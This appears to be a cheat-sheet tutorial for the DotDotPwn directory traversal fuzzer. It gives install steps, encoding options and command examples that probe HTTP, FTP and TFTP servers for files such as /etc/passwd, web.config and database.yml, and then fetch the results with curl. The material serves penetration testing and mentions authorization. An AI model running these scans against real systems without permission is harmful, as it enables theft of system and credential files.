DotDotPwn is a comprehensive directory traversal fuzzer designed to test web servers and applications for path traversal vulnerabilities. It supports multiple traversal patterns, encoding methods, and protocol variations. DotDotPwn is effective for testing various platforms including Apache, IIS, and custom web applications, making it a valuable tool for vulnerability assessment and penetration testing.
The tool systematically tests different traversal sequences, encoding techniques, and protocols to identify path traversal weaknesses that could allow unauthorized access to sensitive files.
sudo apt-get update
sudo apt-get install dotdotpwn
git clone https://github.com/wireghoul/dotdotpwn.git
cd dotdotpwn
perl dotdotpwn.pl -h
# Install required Perl modules
sudo apt-get install libwww-perl
sudo apt-get install libio-socket-ssl-perl
# Or via cpan
cpan IO::Socket::SSL
cpan LWP::UserAgent
perl dotdotpwn.pl --version
perl dotdotpwn.pl --help
which dotdotpwn # If installed as symlink
| Command | Description |
|---|
perl dotdotpwn.pl -h target.com -t http | Test HTTP for directory traversal |
perl dotdotpwn.pl -h target.com -t ftp | Test FTP for directory traversal |
perl dotdotpwn.pl -h target.com -p 8080 -t http | Test custom port |
perl dotdotpwn.pl -h target.com -u /file.txt -t http | Test specific URL path |
# Basic HTTP traversal test
perl dotdotpwn.pl -h example.com -t http
# Test with verbose output
perl dotdotpwn.pl -h example.com -t http -v
# Test specific port
perl dotdotpwn.pl -h example.com -p 8080 -t http
# Test with custom URL
perl dotdotpwn.pl -h example.com -u /download.php -t http
# Test FTP server
perl dotdotpwn.pl -h ftp.example.com -t ftp
# FTP on non-standard port
perl dotdotpwn.pl -h ftp.example.com -p 2121 -t ftp
# Test with credentials
perl dotdotpwn.pl -h ftp.example.com -t ftp -U user -P password
# Test TFTP
perl dotdotpwn.pl -h example.com -t tftp
# Test HTTP via HTTPS
perl dotdotpwn.pl -h example.com -p 443 -t https
| Encoding | Command | Description |
|---|
| No encoding | -e 0 | Plain ../ patterns |
| URL encoding | -e 1 | %2e%2e%2f patterns |
| Double encoding | -e 2 | %252e%252e%252f patterns |
| UTF-8 encoding | -e 3 | UTF-8 encoded traversal |
| Backslash | -e 4 | Windows-style backslash |
| All encodings | -e a | Test all encoding methods |
# Test plain traversal
perl dotdotpwn.pl -h example.com -e 0 -t http
# Test URL encoding
perl dotdotpwn.pl -h example.com -e 1 -t http
# Test double encoding
perl dotdotpwn.pl -h example.com -e 2 -t http
# Test UTF-8 encoding
perl dotdotpwn.pl -h example.com -e 3 -t http
# Test all encodings
perl dotdotpwn.pl -h example.com -e a -t http -v
| Option | Usage | Description |
|---|
-m | -m 1 | Web server type (1=Apache, 2=IIS, 3=Tomcat, etc.) |
-d | -d 5 | Traversal depth (number of ../) |
-f | -f /etc/passwd | Specific file to look for |
-c | -c .php | Custom extension filter |
-s | -s | SSL/HTTPS support |
-o | -o results.txt | Output file |
-x | -x 5 | Timeout in seconds |
# Look for /etc/passwd
perl dotdotpwn.pl -h example.com -f /etc/passwd -t http
# Look for Windows system files
perl dotdotpwn.pl -h example.com -f windows/win.ini -t http
# Look for web server config
perl dotdotpwn.pl -h example.com -f etc/apache2/apache2.conf -t http
# Look for application files
perl dotdotpwn.pl -h example.com -f app/config/database.yml -t http
# Shallow traversal (few ../ sequences)
perl dotdotpwn.pl -h example.com -d 3 -t http
# Deep traversal (many ../ sequences)
perl dotdotpwn.pl -h example.com -d 10 -t http
# Custom extension
perl dotdotpwn.pl -h example.com -c .asp -t http
# Multiple extensions
perl dotdotpwn.pl -h example.com -c .php,.jsp,.asp -t http
# Verbose output to file
perl dotdotpwn.pl -h example.com -t http -o results.txt
# Review findings
cat results.txt
# Extract successful paths
grep "VULNERABLE\|SUCCESS\|FOUND" results.txt
# Get only vulnerable URLs
perl dotdotpwn.pl -h example.com -t http | grep -i "vulnerable"
# Count potential vulnerabilities
perl dotdotpwn.pl -h example.com -t http | grep -c "FOUND\|SUCCESS"
# Extract file paths
perl dotdotpwn.pl -h example.com -t http | grep -oP '/[^/].*'
# Full assessment with all encoding methods
perl dotdotpwn.pl -h target.com -u /download.php -t http -e a -v
# Test multiple paths
for path in /download /file /get /download.php; do
echo "[*] Testing path: $path"
perl dotdotpwn.pl -h target.com -u "$path" -t http -e a
done
# Save comprehensive results
perl dotdotpwn.pl -h target.com -t http -e a -o assessment_results.txt
# Test FTP with multiple encodings
perl dotdotpwn.pl -h ftp.target.com -t ftp -e a -v
# Test with credentials
perl dotdotpwn.pl -h ftp.target.com -t ftp -U admin -P password -e a
# Look for sensitive files
declare -a files=("/etc/passwd" "web.config" "config.php" "settings.xml")
for file in "${files[@]}"; do
echo "[*] Looking for: $file"
perl dotdotpwn.pl -h example.com -f "$file" -t http -e a
done
# Test various traversal depths
for depth in 3 5 7 10 15; do
echo "[*] Testing depth: $depth"
perl dotdotpwn.pl -h example.com -d $depth -t http -v
done
# Test Apache specifically
perl dotdotpwn.pl -h apache.target.com -m 1 -t http
# Look for Apache config
perl dotdotpwn.pl -h apache.target.com -f etc/apache2/apache2.conf -t http
# Test for .htaccess
perl dotdotpwn.pl -h apache.target.com -f .htaccess -t http
# Test IIS specifically
perl dotdotpwn.pl -h iis.target.com -m 2 -t http
# Look for web.config
perl dotdotpwn.pl -h iis.target.com -f windows/web.config -t http
# IIS with backslash encoding
perl dotdotpwn.pl -h iis.target.com -e 4 -t http
# Test Tomcat specifically
perl dotdotpwn.pl -h tomcat.target.com -m 3 -t http
# Look for Tomcat configuration
perl dotdotpwn.pl -h tomcat.target.com -f conf/server.xml -t http
# Test connectivity first
ping target.com
nc -zv target.com 80
# Use timeout option
perl dotdotpwn.pl -h target.com -t http -x 10
# Check if SSL is needed
perl dotdotpwn.pl -h target.com -p 443 -s -t http
# Try verbose mode to see what's being tested
perl dotdotpwn.pl -h target.com -t http -v
# Test with specific path
perl dotdotpwn.pl -h target.com -u /download.php -t http -v
# Try all encoding methods
perl dotdotpwn.pl -h target.com -e a -t http -v
# Check Perl module installation
perl -e "use LWP::UserAgent; print 'OK\n'"
# Reinstall modules if needed
cpan -i IO::Socket::SSL
cpan -i LWP::UserAgent
# Use DotDotPwn findings in other tools
perl dotdotpwn.pl -h example.com -t http > vulnerable_paths.txt
# Further test with curl
while read path; do
curl "http://example.com$path"
done < vulnerable_paths.txt
#!/bin/bash
TARGET="example.com"
ENCODINGS=(0 1 2 3 4)
for encoding in "${ENCODINGS[@]}"; do
echo "[*] Testing encoding: $encoding"
perl dotdotpwn.pl -h "$TARGET" -e "$encoding" -t http -o "results_encoding_$encoding.txt"
done
# Combine results
cat results_*.txt | grep -i "vulnerable" > final_results.txt
- Test all encoding methods, not just plain traversal
- Try different path depths based on application structure
- Test multiple protocol types (HTTP, FTP, etc.)
- Look for specific sensitive files relevant to target application
- Document all successful traversal paths found
- Test both standard and non-standard ports
- Use appropriate timeouts for slow servers
- Be aware of rate limiting and WAF detection
- Respect scope and authorization for testing
- Combine with other vulnerability assessment tools
